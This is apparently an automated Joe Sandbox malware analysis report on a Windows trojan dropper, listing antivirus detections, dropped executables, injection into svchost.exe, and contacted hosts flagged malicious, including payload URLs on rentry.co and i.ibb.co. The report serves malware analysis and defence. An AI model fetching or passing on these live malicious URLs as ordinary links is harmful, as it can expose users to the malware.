svchost.exe (injected by wzcsvc.exe): contacts i.ibb.co
schtasks.exe: started conhost.exe

Source | Detection | Scanner | Label | Link
r8k29DBraE.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
r8k29DBraE.exe | 100% | Avira | TR/AVI.Agent.nhchy |
r8k29DBraE.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\wzcsapi.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\Desktop\wzcsvc.exe | 100% | Avira | HEUR/AGEN.1362795 |
C:\Users\user\Desktop\wzcsapi.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\wzcsvc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\wzcsapi.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Users\user\Desktop\wzcsvc.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/sc | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rentry.co | 104.26.2.16 | true | true | | unknown
windowsupdatebg.s.llnwi.net | 178.79.208.1 | true | false | | unknown
i.ibb.co | 169.197.85.95 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://i.ibb.co/Dwrj41N/Image.png | false | | unknown
https://rentry.co/tranr/raw | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJL0xe | svchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd= | svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdVJk9e | svchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdMe | svchost.exe, 0000000B.00000002.2656318533.0000013DE2100000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy1p | svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy=80600 | svchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID | svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf | svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://account.live.com/inlines | svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://i.ibb.co( | wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A7F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601= | svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf | svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen | svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.msocsp. | lsass.exe, 00000009.00000000.1363146248.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/envelope/ | svchost.exe, 0000000B.00000002.2642526925.0000013DE18BC000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://osoft.co_2010-06X | dwm.exe, 0000000E.00000000.1381748007.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2698819352.00000262ED790000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd: | svchost.exe, 0000000B.00000002.2656318533.0000013DE2100000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                              unknown
                                                              https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://Passport.NET/STSsvchost.exe, 0000000B.00000003.1498001046.0000013DE2179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000009.00000000.1362157507.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2644280399.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://i.ibb.cowzcsapi.exe, 00000003.00000002.2644119365.000000000299C000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000292F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000295E000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600=svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAsvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.23.drfalse
                                                                                          unknown
                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000009.00000000.1362157507.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2644280399.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2666864067.0000013DE2813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502565425.0000013DE2173000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1534241049.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502608348.0000013DE2176000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustAAAAAsvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://Passport.NET/tb_svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://login.microsoftonline.com/MSARST2.srf=svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue2svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://i.ibb.cowzcsapi.exe, 00000003.00000002.2644119365.000000000296C000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569867845.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1498414598.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1516335688.0000013DE215B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://account.live.com/msangcwamsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369560107.0000013DE2157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://crl.ver)svchost.exe, 0000000B.00000002.2645232189.0000013DE18BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://passport.net/tbsvchost.exe, 0000000B.00000002.2666864067.0000013DE2813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://upx.sf.netAmcache.hve.8.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-svchost.exe, 0000000B.00000003.1498329369.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000B.00000003.1570022776.0000013DE28D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1518283361.0000013DE2193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
IP             | Domain    | Country       | Flag | ASN   | ASN Name                    | Malicious
104.26.2.16    | rentry.co | United States | US   | 13335 | CLOUDFLARENET               | true
162.19.58.157  | unknown   | United States | US   | 209   | CENTURYLINK-US-LEGACY-QWEST | false
147.185.221.18 | unknown   | United States | US   | 12087 | SALSGIVER                   | false
169.197.85.95  | i.ibb.co  | United States | US   | 26548 | PUREVOLTAGE-INC             | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1533949
Start date and time: 2024-10-15 11:19:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 28
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: r8k29DBraE.exe (renamed because the original name is a hash value)
Original Sample Name: 03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@16/81@3/4
EGA Information:
• Successful, ratio: 94.4%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 105
• Number of non-executed functions: 307
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.136, 40.126.32.74, 40.126.32.76, 20.190.160.17, 40.126.32.133, 40.126.32.138, 40.126.32.72, 178.79.208.1, 20.190.160.22, 40.126.32.68, 20.190.160.20, 104.208.16.94
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target wzcsapi.exe, PID 6880 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Report size getting too big, too many NtSetInformationFile calls found
• VT rate limit hit for: r8k29DBraE.exe
Time     | Type            | Description
05:20:27 | API Interceptor | 55570x Sleep call for process: wzcsapi.exe modified
